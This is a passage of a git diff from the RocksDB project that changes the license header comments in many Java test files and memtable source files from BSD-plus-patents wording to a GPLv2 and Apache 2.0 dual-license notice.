License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/DirectSliceTest.java b/java/src/test/java/org/rocksdb/DirectSliceTest.java index 5c3a978584e..48ae52afd66 100644 --- a/java/src/test/java/org/rocksdb/DirectSliceTest.java +++ b/java/src/test/java/org/rocksdb/DirectSliceTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; import org.junit.ClassRule; diff --git a/java/src/test/java/org/rocksdb/EnvOptionsTest.java b/java/src/test/java/org/rocksdb/EnvOptionsTest.java index 648f4eb324e..9933b1e1dbe 100644 --- a/java/src/test/java/org/rocksdb/EnvOptionsTest.java +++ b/java/src/test/java/org/rocksdb/EnvOptionsTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/FilterTest.java b/java/src/test/java/org/rocksdb/FilterTest.java index e5bb60fda4c..c6109639e32 100644 --- a/java/src/test/java/org/rocksdb/FilterTest.java +++ b/java/src/test/java/org/rocksdb/FilterTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/FlushTest.java b/java/src/test/java/org/rocksdb/FlushTest.java index f3530292ae1..46a5cdc6802 100644 --- a/java/src/test/java/org/rocksdb/FlushTest.java +++ b/java/src/test/java/org/rocksdb/FlushTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; import org.junit.ClassRule; diff --git a/java/src/test/java/org/rocksdb/IngestExternalFileOptionsTest.java b/java/src/test/java/org/rocksdb/IngestExternalFileOptionsTest.java index e7a50317ba5..83e0dd17af4 100644 --- a/java/src/test/java/org/rocksdb/IngestExternalFileOptionsTest.java +++ b/java/src/test/java/org/rocksdb/IngestExternalFileOptionsTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/KeyMayExistTest.java b/java/src/test/java/org/rocksdb/KeyMayExistTest.java index b2f69c41d43..8092270eb2d 100644 --- a/java/src/test/java/org/rocksdb/KeyMayExistTest.java +++ b/java/src/test/java/org/rocksdb/KeyMayExistTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; import org.junit.ClassRule; diff --git a/java/src/test/java/org/rocksdb/LRUCacheTest.java b/java/src/test/java/org/rocksdb/LRUCacheTest.java index e9d860baa6b..d2cd15b7e97 100644 --- a/java/src/test/java/org/rocksdb/LRUCacheTest.java +++ b/java/src/test/java/org/rocksdb/LRUCacheTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/MemTableTest.java b/java/src/test/java/org/rocksdb/MemTableTest.java index bbd5e2055b3..59503d48181 100644 --- a/java/src/test/java/org/rocksdb/MemTableTest.java +++ b/java/src/test/java/org/rocksdb/MemTableTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/MergeTest.java b/java/src/test/java/org/rocksdb/MergeTest.java index dec01a16209..73b90869cf1 100644 --- a/java/src/test/java/org/rocksdb/MergeTest.java +++ b/java/src/test/java/org/rocksdb/MergeTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/MixedOptionsTest.java b/java/src/test/java/org/rocksdb/MixedOptionsTest.java index bbe29571974..ff68b1b00e3 100644 --- a/java/src/test/java/org/rocksdb/MixedOptionsTest.java +++ b/java/src/test/java/org/rocksdb/MixedOptionsTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/MutableColumnFamilyOptionsTest.java b/java/src/test/java/org/rocksdb/MutableColumnFamilyOptionsTest.java index eb7b3ebc36e..f631905e19f 100644 --- a/java/src/test/java/org/rocksdb/MutableColumnFamilyOptionsTest.java +++ b/java/src/test/java/org/rocksdb/MutableColumnFamilyOptionsTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; import org.junit.Test; diff --git a/java/src/test/java/org/rocksdb/NativeLibraryLoaderTest.java b/java/src/test/java/org/rocksdb/NativeLibraryLoaderTest.java index 186108ffb6b..ab60081a076 100644 --- a/java/src/test/java/org/rocksdb/NativeLibraryLoaderTest.java +++ b/java/src/test/java/org/rocksdb/NativeLibraryLoaderTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; import org.junit.Rule; diff --git a/java/src/test/java/org/rocksdb/OptionsTest.java b/java/src/test/java/org/rocksdb/OptionsTest.java index 71f6ee7dfb3..6afcab3300a 100644 --- a/java/src/test/java/org/rocksdb/OptionsTest.java +++ b/java/src/test/java/org/rocksdb/OptionsTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/PlainTableConfigTest.java b/java/src/test/java/org/rocksdb/PlainTableConfigTest.java index 05bd13863de..dcb6cc39f89 100644 --- a/java/src/test/java/org/rocksdb/PlainTableConfigTest.java +++ b/java/src/test/java/org/rocksdb/PlainTableConfigTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/PlatformRandomHelper.java b/java/src/test/java/org/rocksdb/PlatformRandomHelper.java index b437e7f97b9..80ea4d197f7 100644 --- a/java/src/test/java/org/rocksdb/PlatformRandomHelper.java +++ b/java/src/test/java/org/rocksdb/PlatformRandomHelper.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/RateLimiterTest.java b/java/src/test/java/org/rocksdb/RateLimiterTest.java index 96733d74b0a..27567e89d1d 100644 --- a/java/src/test/java/org/rocksdb/RateLimiterTest.java +++ b/java/src/test/java/org/rocksdb/RateLimiterTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; import org.junit.ClassRule; diff --git a/java/src/test/java/org/rocksdb/ReadOnlyTest.java b/java/src/test/java/org/rocksdb/ReadOnlyTest.java index d993c914848..6b4c7b25961 100644 --- a/java/src/test/java/org/rocksdb/ReadOnlyTest.java +++ b/java/src/test/java/org/rocksdb/ReadOnlyTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; import org.junit.ClassRule; diff --git a/java/src/test/java/org/rocksdb/ReadOptionsTest.java b/java/src/test/java/org/rocksdb/ReadOptionsTest.java index 13d795f55e1..da048c4431e 100644 --- a/java/src/test/java/org/rocksdb/ReadOptionsTest.java +++ b/java/src/test/java/org/rocksdb/ReadOptionsTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/RocksDBExceptionTest.java b/java/src/test/java/org/rocksdb/RocksDBExceptionTest.java index 162b62e55b8..d3bd4ece7f1 100644 --- a/java/src/test/java/org/rocksdb/RocksDBExceptionTest.java +++ b/java/src/test/java/org/rocksdb/RocksDBExceptionTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/RocksDBTest.java b/java/src/test/java/org/rocksdb/RocksDBTest.java index e9549747878..89894746d2c 100644 --- a/java/src/test/java/org/rocksdb/RocksDBTest.java +++ b/java/src/test/java/org/rocksdb/RocksDBTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; import org.junit.ClassRule; diff --git a/java/src/test/java/org/rocksdb/RocksEnvTest.java b/java/src/test/java/org/rocksdb/RocksEnvTest.java index d89570aad27..dfb79610738 100644 --- a/java/src/test/java/org/rocksdb/RocksEnvTest.java +++ b/java/src/test/java/org/rocksdb/RocksEnvTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/RocksIteratorTest.java b/java/src/test/java/org/rocksdb/RocksIteratorTest.java index 4471df9cce1..982dab4fc8f 100644 --- a/java/src/test/java/org/rocksdb/RocksIteratorTest.java +++ b/java/src/test/java/org/rocksdb/RocksIteratorTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; import org.junit.ClassRule; diff --git a/java/src/test/java/org/rocksdb/RocksMemEnvTest.java b/java/src/test/java/org/rocksdb/RocksMemEnvTest.java index 141f7f8506b..04fae2e95de 100644 --- a/java/src/test/java/org/rocksdb/RocksMemEnvTest.java +++ b/java/src/test/java/org/rocksdb/RocksMemEnvTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/SliceTest.java b/java/src/test/java/org/rocksdb/SliceTest.java index 84894ee3800..7ee656cd280 100644 --- a/java/src/test/java/org/rocksdb/SliceTest.java +++ b/java/src/test/java/org/rocksdb/SliceTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; import org.junit.ClassRule; diff --git a/java/src/test/java/org/rocksdb/SnapshotTest.java b/java/src/test/java/org/rocksdb/SnapshotTest.java index 581bae50b97..de48c898bd4 100644 --- a/java/src/test/java/org/rocksdb/SnapshotTest.java +++ b/java/src/test/java/org/rocksdb/SnapshotTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; import org.junit.ClassRule; diff --git a/java/src/test/java/org/rocksdb/SstFileWriterTest.java b/java/src/test/java/org/rocksdb/SstFileWriterTest.java index e8be132030f..8c3b0c3d9f5 100644 --- a/java/src/test/java/org/rocksdb/SstFileWriterTest.java +++ b/java/src/test/java/org/rocksdb/SstFileWriterTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/StatisticsCollectorTest.java b/java/src/test/java/org/rocksdb/StatisticsCollectorTest.java index 565449d76e0..8dd0cd49308 100644 --- a/java/src/test/java/org/rocksdb/StatisticsCollectorTest.java +++ b/java/src/test/java/org/rocksdb/StatisticsCollectorTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/StatisticsTest.java b/java/src/test/java/org/rocksdb/StatisticsTest.java index 6b1d0f16c5d..2103c2fc787 100644 --- a/java/src/test/java/org/rocksdb/StatisticsTest.java +++ b/java/src/test/java/org/rocksdb/StatisticsTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/StatsCallbackMock.java b/java/src/test/java/org/rocksdb/StatsCallbackMock.java index 2e28f28efa6..af8db0caabd 100644 --- a/java/src/test/java/org/rocksdb/StatsCallbackMock.java +++ b/java/src/test/java/org/rocksdb/StatsCallbackMock.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/TtlDBTest.java b/java/src/test/java/org/rocksdb/TtlDBTest.java index bbf25783f3c..cd72634a237 100644 --- a/java/src/test/java/org/rocksdb/TtlDBTest.java +++ b/java/src/test/java/org/rocksdb/TtlDBTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/Types.java b/java/src/test/java/org/rocksdb/Types.java index ca5feb4cb10..c3c1de833a5 100644 --- a/java/src/test/java/org/rocksdb/Types.java +++ b/java/src/test/java/org/rocksdb/Types.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/WALRecoveryModeTest.java b/java/src/test/java/org/rocksdb/WALRecoveryModeTest.java index b1a3655c377..2a0133f6b8c 100644 --- a/java/src/test/java/org/rocksdb/WALRecoveryModeTest.java +++ b/java/src/test/java/org/rocksdb/WALRecoveryModeTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/WriteBatchHandlerTest.java b/java/src/test/java/org/rocksdb/WriteBatchHandlerTest.java index 953a638f940..646a31ce7c7 100644 --- a/java/src/test/java/org/rocksdb/WriteBatchHandlerTest.java +++ b/java/src/test/java/org/rocksdb/WriteBatchHandlerTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/WriteBatchTest.java b/java/src/test/java/org/rocksdb/WriteBatchTest.java index 1e289d532b5..83f90c8eb45 100644 --- a/java/src/test/java/org/rocksdb/WriteBatchTest.java +++ b/java/src/test/java/org/rocksdb/WriteBatchTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/java/src/test/java/org/rocksdb/WriteBatchThreadedTest.java b/java/src/test/java/org/rocksdb/WriteBatchThreadedTest.java index 7dbe99f4fc1..c5090dbceba 100644 --- a/java/src/test/java/org/rocksdb/WriteBatchThreadedTest.java +++ b/java/src/test/java/org/rocksdb/WriteBatchThreadedTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; import org.junit.After; diff --git a/java/src/test/java/org/rocksdb/WriteBatchWithIndexTest.java b/java/src/test/java/org/rocksdb/WriteBatchWithIndexTest.java index 61e7176aeaa..1c5e34234e8 100644 --- a/java/src/test/java/org/rocksdb/WriteBatchWithIndexTest.java +++ b/java/src/test/java/org/rocksdb/WriteBatchWithIndexTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/java/src/test/java/org/rocksdb/WriteOptionsTest.java b/java/src/test/java/org/rocksdb/WriteOptionsTest.java index 733f24b8a75..72a06878664 100644 --- a/java/src/test/java/org/rocksdb/WriteOptionsTest.java +++ b/java/src/test/java/org/rocksdb/WriteOptionsTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/test/RocksJunitRunner.java b/java/src/test/java/org/rocksdb/test/RocksJunitRunner.java index 68f100274ab..02ad0380ee9 100644 --- a/java/src/test/java/org/rocksdb/test/RocksJunitRunner.java +++ b/java/src/test/java/org/rocksdb/test/RocksJunitRunner.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb.test; import org.junit.internal.JUnitSystem; diff --git a/java/src/test/java/org/rocksdb/util/BytewiseComparatorTest.java b/java/src/test/java/org/rocksdb/util/BytewiseComparatorTest.java index 01ea52c49c2..42508bc118e 100644 --- a/java/src/test/java/org/rocksdb/util/BytewiseComparatorTest.java +++ b/java/src/test/java/org/rocksdb/util/BytewiseComparatorTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb.util; diff --git a/java/src/test/java/org/rocksdb/util/EnvironmentTest.java b/java/src/test/java/org/rocksdb/util/EnvironmentTest.java index 85e0c632c44..28ee04768e9 100644 --- a/java/src/test/java/org/rocksdb/util/EnvironmentTest.java +++ b/java/src/test/java/org/rocksdb/util/EnvironmentTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2014, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb.util; import org.junit.AfterClass; diff --git a/java/src/test/java/org/rocksdb/util/SizeUnitTest.java b/java/src/test/java/org/rocksdb/util/SizeUnitTest.java index e74c0410303..990aa5f47a4 100644 --- a/java/src/test/java/org/rocksdb/util/SizeUnitTest.java +++ b/java/src/test/java/org/rocksdb/util/SizeUnitTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb.util; import org.junit.Test; diff --git a/memtable/alloc_tracker.cc b/memtable/alloc_tracker.cc index fa3072c607a..9889cc4230c 100644 --- a/memtable/alloc_tracker.cc +++ b/memtable/alloc_tracker.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/memtable/hash_cuckoo_rep.cc b/memtable/hash_cuckoo_rep.cc index bbcd2dab453..034bf5858b6 100644 --- a/memtable/hash_cuckoo_rep.cc +++ b/memtable/hash_cuckoo_rep.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #ifndef ROCKSDB_LITE diff --git a/memtable/hash_cuckoo_rep.h b/memtable/hash_cuckoo_rep.h index b4418f84f80..800696e931a 100644 --- a/memtable/hash_cuckoo_rep.h +++ b/memtable/hash_cuckoo_rep.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be 